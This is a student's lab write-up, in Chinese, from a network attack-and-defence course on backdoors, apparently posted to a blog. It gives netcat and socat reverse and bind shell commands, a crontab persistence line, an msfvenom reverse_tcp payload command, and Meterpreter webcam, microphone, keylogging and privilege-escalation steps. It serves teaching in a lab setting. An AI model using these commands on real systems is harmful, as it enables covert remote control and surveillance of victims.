20155318 《网络攻防》Exp2 后门原理与实践

基础问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?
  • 下载软件前要勾选一些用户协议,其中部分就存在后门进入系统的安全隐患。
  • 例举你知道的后门如何启动起来(win及linux)的方式?
  • 运行某些程序、或者打开一些文件时后门就会自启动。
  • Meterpreter有哪些给你映像深刻的功能?
  • 在对方植入后门的情况下控制他的电脑,启动摄像头。
  • 如何发现自己有系统有没有被安装后门?
  • 查看正在运行中的程序,被开放的端口是否有异常。

实验内容

使用netcat获取主机操作Shell,cron启动

Windows获得Linux Shell

  • 查询window7的ip使用ncat.exe程序监听本机的5318端口
  • 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5318端口
  • Windows下成功获得了一个Kali的shell,运行结果如下:

Linux获得Windows Shell

  • 过程与上类似,kali下使用nc指令监听5318端口,在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5318端口,运行结果如下:

使用nc传输数据

  • Windows下监听5318端口:
  • Kali下连接到Windows的5318端口:
  • 建立连接之后,两台主机聊天

使用netcat获取主机操作Shell,cron启动

  • 先在Windows系统下,监听5318端口:
  • 用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器
  • 在最后一行添加xx * * * * /bin/netcat 192.168.88.129 5318 -e /bin/sh,意思是在每个小时的第xx分钟反向连接Windows主机的5318端口,我将时间设置在了一分钟以后:

使用socat获取主机操作Shell, 任务计划启动

在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:

  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5318 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5318,同时把cmd.exe的stderr重定向到stdout上
  • 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行
  • 在Kali环境下输入指令socat - tcp:192.168.88.129:5318,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5318端口,此时可以发现已经成功获得了一个cmd shell:

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入指令`msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.135 LPORT=5318 -f exe > 5318_backdoor.exe生成后门程序:
  • 通过nc指令将生成的后门程序传送到Windows主机上:
  • 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口,用show options查看
  • 进行监听,打开Windows上的后门程序,此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令可以截获一段音频:
  • 使用webcam_snap指令可以使用摄像头进行拍照:(忽略画面)
  • 使用screenshot指令可以进行截屏:
  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
  • 先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功

实验总结与体会

这次试验让我有了一种假装自己是黑客的感觉,按照老师的要求完成实验内容,初步了解了后门的原理和实践情况。印象最深的是截屏和启动摄像头这两个功能。但是目前的实验还是在关闭防火墙,关闭杀毒软件的环境下完成的,更期待今后在不刻意关闭这些的情况下的实验项目~

20155318 《网络攻防》Exp2 后门原理与实践的更多相关文章

  1. 20155331 丹增旦达 网络攻防 Exp2后门原理与实践

    20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  2. 20155323刘威良 网络对抗 Exp2 后门原理与实践

    20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

  3. 2018-2019-2 20165312《网络攻防技术》Exp2 后门原理与实践

    2018-2019-2 20165312<网络攻防技术>Exp2 后门原理与实践 课上知识点梳理总结 1.后门的概述 后门是指不经过正常认证流程而访问系统的通道 两个关键词:未认证.隐通道 ...

  4. 20155308 《网络攻防》 Exp2 后门原理与实践

    20155308 <网络攻防> Exp2 后门原理与实践 学习内容:使用nc实现win,mac,Linux间的后门连接 :meterpraeter的应用 :MSF POST 模块的应用 学 ...

  5. 20155321 《网络攻防》 Exp2 后门原理与实践

    20155321 <网络攻防> Exp2 后门原理与实践 实验内容 例举你能想到的一个后门进入到你系统中的可能方式? 我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站 ...

  6. 20155336 虎光元《网络攻防》Exp2后门原理与实践

    20155336 虎光元<网络攻防>Exp2后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shel ...

  7. 20155306 白皎 《网络攻防》 Exp2 后门原理与实践

    20155306 白皎 <网络攻防> Exp2 后门原理与实践 一.实践基础 后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作.后程序和电脑病毒最大的差别, ...

  8. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  9. 2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒 ...

随机推荐

  1. FineReport新增多项目甘特图示例及操作

    1.描述 我们在做报表的时候,往往想体现其中随着时间的变化而产生的项目进度的变化和其他相关的系统进展,每当这种时候甘特图便是其中的不二之选.FineReport新增的多项目甘特图可以说是满足了大多数的 ...

  2. Fit项目分页组件的编写

    项目中涉及列表显示的地方都会用到分页控件,为了能更好地与当前网站的样式匹配,这次要自己实现一个. 所以选择了模板中提供的分页样式,基于模板改造以能够动态生成: 一 控件的行为规则 a) 可设置显示几个 ...

  3. GridLayout和GridView的区别

    GridView是一种适配器布局,它的继承关系是ViewGroup-->AdapterView-->AbsListView-->GridView,他是从一个adapter中取出内容填 ...

  4. Expo大作战(五)--expo中app.json 文件的配置信息

    简要:本系列文章讲会对expo进行全面的介绍,本人从2017年6月份接触expo以来,对expo的研究断断续续,一路走来将近10个月,废话不多说,接下来你看到内容,讲全部来与官网 我猜去全部机翻+个人 ...

  5. 8.什么是模块,模块的导入,__name__

    相关内容: 什么是模块 模块的导入 模块的导入 自模块的导入 同级目录导入 不同级目录导入 目录内导入目录外 目录外导入目录内 __name__ 首发时间:2018-02-04 15:23 修改: 2 ...

  6. LeetCode题解之N-ary Tree Preorder Traversal

    1.题目描述 2.问题分析 采用递归方法是标准解法. 3.代码 vector<int> preorder(Node* root) { vector<int> v; preNor ...

  7. LeetCode题解之Climbing Stairs

    1.题目描述 2.问题分析 使用动态规划. 3.代码 int climbStairs(int n) { ){ return n; } ]; dp[] = ; dp[] = ; dp[] = ; ; i ...

  8. Sysstat的工具集sar、 iostat、mpstat、sadf、sar、sadc

    sysstat Sysstat的工具集sar. iostat.mpstat.sadf.sar.sadc * iostat 工具提供CPU使用率及硬盘吞吐效率的数据: * mpstat 工具提供单个处理 ...

  9. zabbix之运维疑难总结

    2.trousers包 zabbix默认情况下要求trousers包的版本是0.3.12版本以上.如果低于这个版本,有可能zabbix-server服务启动不成功.在mysql7.1版本以上可能会使用 ...

  10. 开源作业调度框架 - Quartz.NET - Cron表达式测试

    昨天简单写了一下如何使用Quzrtz.NET. 那么问题来了,我设置了Cron表达式之后如何知道是表达式是否按照预期的时间执行了呢? 我找到了些Cron表达式工具生成了表达式,确发现它们基本上没有进行 ...